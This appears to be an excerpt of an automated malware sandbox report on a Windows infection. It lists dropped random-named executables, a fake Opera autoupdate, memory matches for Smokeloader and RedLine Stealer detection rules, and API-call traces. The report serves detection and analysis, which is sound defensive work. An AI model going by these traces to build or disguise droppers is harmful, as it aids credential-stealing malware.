                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\JJGhmGOEefZp3FWJtWea5kYv.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\UVZ0INMy369gioArueMwqIMb.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\2h93Z8eIGDBBod8joPEiBXPj.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\gNNWpgxfSZev9CgAoQqZomFj.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\04gOIpVzf7VOcPzY7ZRrzAhZ.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\esF1MUrWaaVP5MG9h4MWEG3L.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\8MN4Hb5Yz3QkTtMyZERbTpkY.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\E6QKqd9T2KlIZuLZuluVgjTV.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\XvEaDZrVEGhrm4VFfP27fZuD.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\uYudt0flCl0e0fQZ8vnWLOhm.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Imc6gJg8H4cjDDr1J0xEqhfy.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\c36pugF7AAA4eRfz8vwQAxCJ.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\dyzUSu8swmONfKr10ailCBUT.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\kJzN0xpcdgPX8gN1vxWscdbl.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\XHapUUFNPyUhtn0ymqhPvOC6.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\ksgmAg6JFdvOTBh26OHdTIc1.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\8p4ak8QNfpnbvonzNVxC2iTG.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\n6BdP4kaWy0FkY7qAUh37msr.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\kbc9DF565eKnpzDzd5tpGZeU.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\kW8yqxmpQubjD4ulwCtyGF1P.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\gUW3x0OL7IoJHOyAbWlNdUAG.exe entropy: 7.99369020398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\Pictures\KECo793ffsnuAKrbhcJr4Al2.exe entropy: 7.99369020398
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Opera_108.0.5067.24_Autoupdate_x64[3].exe entropy: 7.99847391421
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_package entropy: 7.9984734466

                    System Summary

                    Source: 0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000002E.00000002.3117320698.00000000006F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000025.00000002.3137395585.00000000007C2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000025.00000002.3136775469.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000001C.00000002.3386959537.0000000000732000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000016.00000002.3368358435.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000019.00000002.2841787321.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000020.00000002.3324821241.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000019.00000002.2841630563.00000000004F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0042F520 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00423B84 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004125D8 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00478AC0 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0042E934 CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | Code function: 14_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Code function: 21_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | Code function: 14_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_0048DF54
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 16_2_00401051
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 16_2_00401C26
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 16_2_00406EB3
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_00401051
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_00401C26
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_00406EB3
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009CE84D
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009CB2FA
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009D5A60
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009C8B02
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009CE359
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009D54E9
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009D3474
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009CEC65
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009CA544
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009BF670
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EAD2AC
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E4B8A1
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E75F1F
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E40065
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E9E24F
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E5023C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E62554
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E9A4A7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E4E4BF
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E94783
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E7A790
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E18736
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E86668
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E58670
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E10856
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EA0BA9
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E62CA3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E98FE2
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E88FCA
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E52F80
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EA2F47
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E56F18
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E4CEF9
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E1EEFF
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E64E0C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EA91F6
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E9316A
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E9F0ED
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EA70CF
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E9D0C3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E8D0B6
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E6904E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E4304E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E15337
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E19208
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E534E3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E77452
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E37930
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E7B85E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E21816
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E9FBF0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E55BD7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EA5B62
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E91DC1
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E6DDA5
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E31DAB
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E95D7A
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E5BC4C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E25FA2
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E1DEC2
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E69E8F
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61E89E0E
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: String function: 004043B0 appears 316 times
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: String function: 009C91A0 appears 37 times
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: String function: 009D59F0 appears 138 times
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: PYAjuaDlqLKzTVmA3BsThyOt.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 86xjLODySsaA2ccNlRbH98y4.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: aUwbp4hWfsJe82ZKgal8jxB3.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: eofj7Pf9I3ORdN1nDBhGJIZl.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: rPFTzpNmT3Qntv8acJaf28oV.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: HnpqZr8MiBteqHFNrwWZBXQR.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 5TjWUMIFlYsM1w3seMz5vnCW.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 4OwcyrblkGc2hCszHEHuZCPV.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: CZMrbdv3aANr0IrdmBiWfjaH.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 53tlSJicrflVnn9iBsteA9ZP.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: EjtrSvV6de28lGZAjtWMHEkL.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: PPRbCMR3JwR3Rpdv3d5rSgFs.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Rk1pfEVtKjXZKi5E0UJ5igqM.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: yXBgs4CMjv6Y3CFxbTDDkpre.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: K38UiC8IqghDOwq5NDROdySK.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: C83U8puVpwkXcWSHiHRNiMd6.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: FnEWeb8TPMfAXv33KZpKVFTq.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: u47GFmiT4x96ZGJgiflf2j9o.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 5v3yEEfK5SV2v9Tq3rUk66Ct.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: MZK43d4eyhmNVFNhS9RLdaaU.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: KF9G3AcCbu7Zl4IuQK8qDucc.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
